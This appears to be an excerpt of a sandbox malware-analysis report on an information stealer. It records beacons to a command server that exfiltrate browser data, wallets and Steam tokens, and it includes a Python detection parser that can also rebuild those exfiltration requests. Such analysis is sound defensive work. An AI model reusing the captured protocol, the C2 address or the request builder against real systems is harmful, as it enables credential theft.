6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="file"------GCGHJEBGHJKEBFHIJDHC--
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/freebl3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/mozglue.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/msvcp140.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/nss3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/softokn3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/vcruntime140.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.231.69.191Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFHost: 185.231.69.191Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 46 2d 2d 0d 0a Data Ascii: ------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------JJKEBGHJKFIDGCAAFCAFContent-Disposition: form-data; name="message"wallets------JJKEBGHJKFIDGCAAFCAF--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFHost: 185.231.69.191Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 2d 2d 0d 0a Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="message"files------FHCAEGCBFHJDGCBFHDAF--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHIIHost: 185.231.69.191Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 2d 2d 0d 0a Data Ascii: ------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BGIIDAEBGCAAECAKFHIIContent-Disposition: form-data; name="file"------BGIIDAEBGCAAECAKFHII--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKHost: 185.231.69.191Content-Length: 134243Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBHost: 185.231.69.191Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 2d 2d 0d 0a Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="message"ybncbhylepme------GIIJEBAECGCBKECAAAEB--
Source: global traffic HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 185.231.69.191Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 65 34 61 34 37 37 39 35 37 63 66 32 30 62 64 31 33 66 36 36 34 37 65 62 61 35 65 34 34 31 62 31 35 36 38 39 33 65 36 33 35 39 61 65 66 30 39 61 63 39 34 61 64 61 64 32 36 32 37 36 32 62 37 64 63 66 66 38 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 2d 2d 0d 0a Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IECFIEGDBKJKFIDHIECG--
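The POST sequence above is the stealer's check-in and exfiltration protocol as it appears on the wire: a registration request carrying hwid and build, then a run of token-bearing requests whose message field names the collection stage (browsers, plugins, fplugins, wallets, files) and whose file_name/file fields are base64-encoded. The parser below is an added example written for this page; it is not code from Joe Sandbox or from the sample. It reconstructs the captured requests from the report's Data Ascii column (the CRLF framing follows the 0d 0a bytes in the Data Raw hex, and the rebuilt bodies reproduce the reported Content-Length values), parses the multipart fields, decodes the base64 fields, and tags each request with the traits visible in this capture: a 16-hex-character .php path, a boundary of "----" plus 20 letters drawn only from A..K, an IP-literal Host, no User-Agent header, and the dependency DLL set fetched from /ec05bb5a9eb90166/. Those traits are observations from this one capture, not a vendor signature. The reading of a decoded file body shaped like {"id":1,"result":{"cookies":[]}} as a Chrome DevTools Protocol reply is an inference from its shape; the report only states that an Application-Bound Encryption bypass was attempted.

```python
import base64
import json
import re
from dataclasses import dataclass, field

# Traits observed in this capture (not a vendor signature):
# - POST target is a 16-hex-character .php name
# - multipart boundary is "----" followed by 20 letters from A..K only
# - Host is an IP literal and no User-Agent header is sent
C2_PATH_RE = re.compile(r"^/[0-9a-f]{16}\.php$")
BOUNDARY_RE = re.compile(r"^----[A-K]{20}$")
IP_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
B64_FIELDS = {"file_name", "file"}  # fields the stealer base64-encodes
# Dependency DLLs fetched over plain HTTP before browser-database theft.
STAGED_DLLS = {"sqlite3.dll", "freebl3.dll", "mozglue.dll", "nss3.dll",
               "softokn3.dll", "msvcp140.dll", "vcruntime140.dll"}


@dataclass
class Beacon:
    method: str
    path: str
    headers: dict
    fields: dict = field(default_factory=dict)    # raw multipart fields
    decoded: dict = field(default_factory=dict)   # base64 fields, decoded
    indicators: list = field(default_factory=list)


def _multipart_fields(body: bytes, boundary: str):
    """Yield (name, value) per part; an empty part (the 'file' field sent
    with no content) yields b''."""
    delim = b"--" + boundary.encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # "--boundary--" closes the body
            break
        chunk = chunk.removeprefix(b"\r\n").removesuffix(b"\r\n")
        part_hdr, _, value = chunk.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', part_hdr)
        if m:
            yield m.group(1).decode(), value


def parse_request(raw: bytes) -> Beacon:
    """Parse one HTTP/1.1 request as captured on the wire (CRLF framing)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    b = Beacon(method, path, headers)
    m = re.search(r"boundary=(\S+)", headers.get("content-type", ""))
    boundary = m.group(1) if m else ""

    if C2_PATH_RE.match(path):
        b.indicators.append("c2_path")
    if BOUNDARY_RE.match(boundary):
        b.indicators.append("a-k_boundary")
    if IP_HOST_RE.match(headers.get("host", "")):
        b.indicators.append("ip_literal_host")
    if "user-agent" not in headers:
        b.indicators.append("no_user_agent")
    basename = path.rsplit("/", 1)[-1]
    if method == "GET" and basename in STAGED_DLLS:
        b.indicators.append("staged_dll:" + basename)

    if method == "POST" and boundary:
        for name, value in _multipart_fields(body, boundary):
            b.fields[name] = value
            if name in B64_FIELDS and value:
                b.decoded[name] = base64.b64decode(
                    value, validate=True).decode("utf-8", "replace")
        if "hwid" in b.fields:
            b.indicators.append("register:" + b.fields.get("build", b"").decode())
        if "message" in b.fields:
            b.indicators.append("stage:" + b.fields["message"].decode())
        if "file_name" in b.decoded:
            b.indicators.append("exfil:" + b.decoded["file_name"])
        # Inference: a JSON body with id/result/cookies has the shape of a
        # Chrome DevTools Protocol reply (Network.getAllCookies).
        try:
            doc = json.loads(b.decoded.get("file", ""))
            if isinstance(doc, dict) and "cookies" in doc.get("result", {}):
                b.indicators.append("cdp_cookie_dump")
        except ValueError:
            pass
    return b


def build_post(boundary: str, fields: dict, host: str = "185.231.69.191") -> bytes:
    """Constructed sample input: rebuild a beacon's wire bytes from the
    report's Data Ascii column, using the CRLF framing seen in Data Raw."""
    body = b""
    for name, value in fields.items():
        body += (b"--" + boundary.encode() + b'\r\nContent-Disposition: form-data; name="'
                 + name.encode() + b'"\r\n\r\n' + value.encode() + b"\r\n")
    body += b"--" + boundary.encode() + b"--\r\n"
    head = (f"POST /f190e2808a5419c3.php HTTP/1.1\r\nContent-Type: multipart/form-data; "
            f"boundary={boundary}\r\nHost: {host}\r\nContent-Length: {len(body)}\r\n"
            f"Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n")
    return head.encode() + body


TOKEN = "e62e4a477957cf20bd13f6647eba5e441b156893e6359aef09ac94adad262762b7dcff87"
SAMPLES = [  # constructed from the report's request lines, in capture order
    build_post("----IEHDAFHDHCBFIDGCFIDG", {"hwid": "5A8FC13350E01671227304", "build": "LogsDiller"}),
    build_post("----BFIDGHDBAFIJJJJKJDHD", {"token": TOKEN, "message": "browsers"}),
    build_post("----DBKKFCBAKKFBGCBFHJDG", {"token": TOKEN,
               "file_name": "Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=",
               "file": "eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0="}),
    build_post("----KKECBFCGIEGCBGCAECGC", {"token": TOKEN, "file_name": "c21qbGxteW1sYnpxLnB3ZA==", "file": ""}),
    b"GET /ec05bb5a9eb90166/nss3.dll HTTP/1.1\r\nHost: 185.231.69.191\r\nCache-Control: no-cache\r\n\r\n",
]


def timeline(requests) -> list:
    """Ordered indicator list across a capture: registration, stages, exfil."""
    return [ind for req in requests for ind in parse_request(req).indicators]


if __name__ == "__main__":
    for req in SAMPLES:
        b = parse_request(req)
        print(b.method, b.path, b.indicators, b.decoded)
```

Run as-is, the rebuilt registration body is 217 bytes and the cookie-exfil body 419 bytes, matching the Content-Length headers in the report, which is the check that the reconstruction follows the real framing. On live captures feed parse_request the raw request bytes from the PCAP instead of build_post; the empty file parts (smjllmymlbzq.pwd, steam_tokens.txt) show why the parser must tolerate a zero-length value rather than treat it as a truncated request.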
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49709 -> 185.231.69.191:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49787 -> 185.231.69.191:80
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: unknown TCP traffic detected without corresponding DNS query: 185.231.69.191
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.231.69.191Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/sqlite3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/freebl3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/mozglue.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/msvcp140.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/nss3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/softokn3.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ec05bb5a9eb90166/vcruntime140.dll HTTP/1.1Host: 185.231.69.191Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: unknown HTTP traffic detected: POST /f190e2808a5419c3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDGHost: 185.231.69.191Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 38 46 43 31 33 33 35 30 45 30 31 36 37 31 32 32 37 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a Data Ascii: ------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="hwid"5A8FC13350E01671227304------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="build"LogsDiller------IEHDAFHDHCBFIDGCFIDG--
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp, gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001527000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.231.69.191
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.000000000156E000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.000000000156E000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/_u
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/freebl3.dll
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/freebl3.dll3g
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/freebl3.dllCf
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/mozglue.dll
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/mozglue.dllGg
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/msvcp140.dll
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/msvcp140.dllMf
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/nss3.dll
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/nss3.dllk
